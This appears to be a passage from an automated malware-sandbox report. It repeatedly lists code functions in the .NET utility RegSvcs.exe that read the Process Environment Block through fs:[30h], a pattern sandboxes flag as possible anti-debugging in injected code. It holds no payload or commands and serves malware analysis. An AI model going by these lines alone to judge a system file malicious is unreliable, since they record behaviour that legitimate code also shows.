                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01540274 mov eax, dword ptr fs:[00000030h]7_2_01540274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01540274 mov eax, dword ptr fs:[00000030h]7_2_01540274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01540274 mov eax, dword ptr fs:[00000030h]7_2_01540274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01540274 mov eax, dword ptr fs:[00000030h]7_2_01540274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01540274 mov eax, dword ptr fs:[00000030h]7_2_01540274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01540274 mov eax, dword ptr fs:[00000030h]7_2_01540274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01540274 mov eax, dword ptr fs:[00000030h]7_2_01540274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01540274 mov eax, dword ptr fs:[00000030h]7_2_01540274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0148826B mov eax, dword ptr fs:[00000030h]7_2_0148826B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01494260 mov eax, dword ptr fs:[00000030h]7_2_01494260
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01494260 mov eax, dword ptr fs:[00000030h]7_2_01494260
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01494260 mov eax, dword ptr fs:[00000030h]7_2_01494260
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0148823B mov eax, dword ptr fs:[00000030h]7_2_0148823B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_015662D6 mov eax, dword ptr fs:[00000030h]7_2_015662D6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0149A2C3 mov eax, dword ptr fs:[00000030h]7_2_0149A2C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0149A2C3 mov eax, dword ptr fs:[00000030h]7_2_0149A2C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0149A2C3 mov eax, dword ptr fs:[00000030h]7_2_0149A2C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0149A2C3 mov eax, dword ptr fs:[00000030h]7_2_0149A2C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0149A2C3 mov eax, dword ptr fs:[00000030h]7_2_0149A2C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014A02E1 mov eax, dword ptr fs:[00000030h]7_2_014A02E1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014A02E1 mov eax, dword ptr fs:[00000030h]7_2_014A02E1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014A02E1 mov eax, dword ptr fs:[00000030h]7_2_014A02E1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014CE284 mov eax, dword ptr fs:[00000030h]7_2_014CE284
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014CE284 mov eax, dword ptr fs:[00000030h]7_2_014CE284
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01510283 mov eax, dword ptr fs:[00000030h]7_2_01510283
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01510283 mov eax, dword ptr fs:[00000030h]7_2_01510283
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01510283 mov eax, dword ptr fs:[00000030h]7_2_01510283
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_015262A0 mov eax, dword ptr fs:[00000030h]7_2_015262A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_015262A0 mov ecx, dword ptr fs:[00000030h]7_2_015262A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_015262A0 mov eax, dword ptr fs:[00000030h]7_2_015262A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_015262A0 mov eax, dword ptr fs:[00000030h]7_2_015262A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_015262A0 mov eax, dword ptr fs:[00000030h]7_2_015262A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_015262A0 mov eax, dword ptr fs:[00000030h]7_2_015262A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01498550 mov eax, dword ptr fs:[00000030h]7_2_01498550
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01498550 mov eax, dword ptr fs:[00000030h]7_2_01498550
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014C656A mov eax, dword ptr fs:[00000030h]7_2_014C656A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014C656A mov eax, dword ptr fs:[00000030h]7_2_014C656A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014C656A mov eax, dword ptr fs:[00000030h]7_2_014C656A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01526500 mov eax, dword ptr fs:[00000030h]7_2_01526500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01564500 mov eax, dword ptr fs:[00000030h]7_2_01564500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01564500 mov eax, dword ptr fs:[00000030h]7_2_01564500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01564500 mov eax, dword ptr fs:[00000030h]7_2_01564500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01564500 mov eax, dword ptr fs:[00000030h]7_2_01564500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01564500 mov eax, dword ptr fs:[00000030h]7_2_01564500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01564500 mov eax, dword ptr fs:[00000030h]7_2_01564500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01564500 mov eax, dword ptr fs:[00000030h]7_2_01564500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014BE53E mov eax, dword ptr fs:[00000030h]7_2_014BE53E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014BE53E mov eax, dword ptr fs:[00000030h]7_2_014BE53E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014BE53E mov eax, dword ptr fs:[00000030h]7_2_014BE53E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014BE53E mov eax, dword ptr fs:[00000030h]7_2_014BE53E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014BE53E mov eax, dword ptr fs:[00000030h]7_2_014BE53E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014A0535 mov eax, dword ptr fs:[00000030h]7_2_014A0535
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014A0535 mov eax, dword ptr fs:[00000030h]7_2_014A0535
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014A0535 mov eax, dword ptr fs:[00000030h]7_2_014A0535
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014A0535 mov eax, dword ptr fs:[00000030h]7_2_014A0535
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014A0535 mov eax, dword ptr fs:[00000030h]7_2_014A0535
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014A0535 mov eax, dword ptr fs:[00000030h]7_2_014A0535
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014CE5CF mov eax, dword ptr fs:[00000030h]7_2_014CE5CF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014CE5CF mov eax, dword ptr fs:[00000030h]7_2_014CE5CF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014965D0 mov eax, dword ptr fs:[00000030h]7_2_014965D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014CA5D0 mov eax, dword ptr fs:[00000030h]7_2_014CA5D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014CA5D0 mov eax, dword ptr fs:[00000030h]7_2_014CA5D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014CC5ED mov eax, dword ptr fs:[00000030h]7_2_014CC5ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014CC5ED mov eax, dword ptr fs:[00000030h]7_2_014CC5ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014925E0 mov eax, dword ptr fs:[00000030h]7_2_014925E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014BE5E7 mov eax, dword ptr fs:[00000030h]7_2_014BE5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014BE5E7 mov eax, dword ptr fs:[00000030h]7_2_014BE5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014BE5E7 mov eax, dword ptr fs:[00000030h]7_2_014BE5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014BE5E7 mov eax, dword ptr fs:[00000030h]7_2_014BE5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014BE5E7 mov eax, dword ptr fs:[00000030h]7_2_014BE5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014BE5E7 mov eax, dword ptr fs:[00000030h]7_2_014BE5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014BE5E7 mov eax, dword ptr fs:[00000030h]7_2_014BE5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014BE5E7 mov eax, dword ptr fs:[00000030h]7_2_014BE5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014C4588 mov eax, dword ptr fs:[00000030h]7_2_014C4588
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01492582 mov eax, dword ptr fs:[00000030h]7_2_01492582
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01492582 mov ecx, dword ptr fs:[00000030h]7_2_01492582
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014CE59C mov eax, dword ptr fs:[00000030h]7_2_014CE59C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_015105A7 mov eax, dword ptr fs:[00000030h]7_2_015105A7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_015105A7 mov eax, dword ptr fs:[00000030h]7_2_015105A7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_015105A7 mov eax, dword ptr fs:[00000030h]7_2_015105A7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014B45B1 mov eax, dword ptr fs:[00000030h]7_2_014B45B1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014B45B1 mov eax, dword ptr fs:[00000030h]7_2_014B45B1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0154A456 mov eax, dword ptr fs:[00000030h]7_2_0154A456
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014CE443 mov eax, dword ptr fs:[00000030h]7_2_014CE443
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014CE443 mov eax, dword ptr fs:[00000030h]7_2_014CE443
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014CE443 mov eax, dword ptr fs:[00000030h]7_2_014CE443
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014CE443 mov eax, dword ptr fs:[00000030h]7_2_014CE443
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014CE443 mov eax, dword ptr fs:[00000030h]7_2_014CE443
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014CE443 mov eax, dword ptr fs:[00000030h]7_2_014CE443
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014CE443 mov eax, dword ptr fs:[00000030h]7_2_014CE443
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014CE443 mov eax, dword ptr fs:[00000030h]7_2_014CE443
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014B245A mov eax, dword ptr fs:[00000030h]7_2_014B245A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0148645D mov eax, dword ptr fs:[00000030h]7_2_0148645D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0151C460 mov ecx, dword ptr fs:[00000030h]7_2_0151C460
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014BA470 mov eax, dword ptr fs:[00000030h]7_2_014BA470
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014BA470 mov eax, dword ptr fs:[00000030h]7_2_014BA470
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014BA470 mov eax, dword ptr fs:[00000030h]7_2_014BA470
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014C8402 mov eax, dword ptr fs:[00000030h]7_2_014C8402
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014C8402 mov eax, dword ptr fs:[00000030h]7_2_014C8402
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014C8402 mov eax, dword ptr fs:[00000030h]7_2_014C8402
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0148E420 mov eax, dword ptr fs:[00000030h]7_2_0148E420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0148E420 mov eax, dword ptr fs:[00000030h]7_2_0148E420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0148E420 mov eax, dword ptr fs:[00000030h]7_2_0148E420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0148C427 mov eax, dword ptr fs:[00000030h]7_2_0148C427
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01516420 mov eax, dword ptr fs:[00000030h]7_2_01516420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01516420 mov eax, dword ptr fs:[00000030h]7_2_01516420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01516420 mov eax, dword ptr fs:[00000030h]7_2_01516420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01516420 mov eax, dword ptr fs:[00000030h]7_2_01516420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01516420 mov eax, dword ptr fs:[00000030h]7_2_01516420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01516420 mov eax, dword ptr fs:[00000030h]7_2_01516420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01516420 mov eax, dword ptr fs:[00000030h]7_2_01516420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014CA430 mov eax, dword ptr fs:[00000030h]7_2_014CA430
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014904E5 mov ecx, dword ptr fs:[00000030h]7_2_014904E5
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0154A49A mov eax, dword ptr fs:[00000030h]7_2_0154A49A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0151A4B0 mov eax, dword ptr fs:[00000030h]7_2_0151A4B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014964AB mov eax, dword ptr fs:[00000030h]7_2_014964AB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014C44B0 mov ecx, dword ptr fs:[00000030h]7_2_014C44B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014C674D mov esi, dword ptr fs:[00000030h]7_2_014C674D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014C674D mov eax, dword ptr fs:[00000030h]7_2_014C674D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014C674D mov eax, dword ptr fs:[00000030h]7_2_014C674D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01514755 mov eax, dword ptr fs:[00000030h]7_2_01514755
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0151E75D mov eax, dword ptr fs:[00000030h]7_2_0151E75D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01490750 mov eax, dword ptr fs:[00000030h]7_2_01490750
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014D2750 mov eax, dword ptr fs:[00000030h]7_2_014D2750
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014D2750 mov eax, dword ptr fs:[00000030h]7_2_014D2750
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01498770 mov eax, dword ptr fs:[00000030h]7_2_01498770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014A0770 mov eax, dword ptr fs:[00000030h]7_2_014A0770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014A0770 mov eax, dword ptr fs:[00000030h]7_2_014A0770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014A0770 mov eax, dword ptr fs:[00000030h]7_2_014A0770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014A0770 mov eax, dword ptr fs:[00000030h]7_2_014A0770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014A0770 mov eax, dword ptr fs:[00000030h]7_2_014A0770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014A0770 mov eax, dword ptr fs:[00000030h]7_2_014A0770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014A0770 mov eax, dword ptr fs:[00000030h]7_2_014A0770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014A0770 mov eax, dword ptr fs:[00000030h]7_2_014A0770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014A0770 mov eax, dword ptr fs:[00000030h]7_2_014A0770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014A0770 mov eax, dword ptr fs:[00000030h]7_2_014A0770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014A0770 mov eax, dword ptr fs:[00000030h]7_2_014A0770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014A0770 mov eax, dword ptr fs:[00000030h]7_2_014A0770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014CC700 mov eax, dword ptr fs:[00000030h]7_2_014CC700
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01490710 mov eax, dword ptr fs:[00000030h]7_2_01490710
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014C0710 mov eax, dword ptr fs:[00000030h]7_2_014C0710
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0150C730 mov eax, dword ptr fs:[00000030h]7_2_0150C730
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014CC720 mov eax, dword ptr fs:[00000030h]7_2_014CC720
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014CC720 mov eax, dword ptr fs:[00000030h]7_2_014CC720
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014C273C mov eax, dword ptr fs:[00000030h]7_2_014C273C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014C273C mov ecx, dword ptr fs:[00000030h]7_2_014C273C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014C273C mov eax, dword ptr fs:[00000030h]7_2_014C273C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0149C7C0 mov eax, dword ptr fs:[00000030h]7_2_0149C7C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_015107C3 mov eax, dword ptr fs:[00000030h]7_2_015107C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014B27ED mov eax, dword ptr fs:[00000030h]7_2_014B27ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014B27ED mov eax, dword ptr fs:[00000030h]7_2_014B27ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014B27ED mov eax, dword ptr fs:[00000030h]7_2_014B27ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0151E7E1 mov eax, dword ptr fs:[00000030h]7_2_0151E7E1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014947FB mov eax, dword ptr fs:[00000030h]7_2_014947FB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014947FB mov eax, dword ptr fs:[00000030h]7_2_014947FB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0153678E mov eax, dword ptr fs:[00000030h]7_2_0153678E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014907AF mov eax, dword ptr fs:[00000030h]7_2_014907AF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_015447A0 mov eax, dword ptr fs:[00000030h]7_2_015447A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014AC640 mov eax, dword ptr fs:[00000030h]7_2_014AC640
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014CA660 mov eax, dword ptr fs:[00000030h]7_2_014CA660
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014CA660 mov eax, dword ptr fs:[00000030h]7_2_014CA660
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014C2674 mov eax, dword ptr fs:[00000030h]7_2_014C2674
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0155866E mov eax, dword ptr fs:[00000030h]7_2_0155866E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0155866E mov eax, dword ptr fs:[00000030h]7_2_0155866E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014A260B mov eax, dword ptr fs:[00000030h]7_2_014A260B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014A260B mov eax, dword ptr fs:[00000030h]7_2_014A260B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014A260B mov eax, dword ptr fs:[00000030h]7_2_014A260B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014A260B mov eax, dword ptr fs:[00000030h]7_2_014A260B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014A260B mov eax, dword ptr fs:[00000030h]7_2_014A260B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014A260B mov eax, dword ptr fs:[00000030h]7_2_014A260B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014A260B mov eax, dword ptr fs:[00000030h]7_2_014A260B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014D2619 mov eax, dword ptr fs:[00000030h]7_2_014D2619
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0150E609 mov eax, dword ptr fs:[00000030h]7_2_0150E609
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0149262C mov eax, dword ptr fs:[00000030h]7_2_0149262C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014C6620 mov eax, dword ptr fs:[00000030h]7_2_014C6620
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014C8620 mov eax, dword ptr fs:[00000030h]7_2_014C8620
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014AE627 mov eax, dword ptr fs:[00000030h]7_2_014AE627
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014CA6C7 mov ebx, dword ptr fs:[00000030h]7_2_014CA6C7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_014CA6C7 mov eax, dword ptr fs:[00000030h]7_2_014CA6C7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_015106F1 mov eax, dword ptr fs:[00000030h]7_2_015106F1
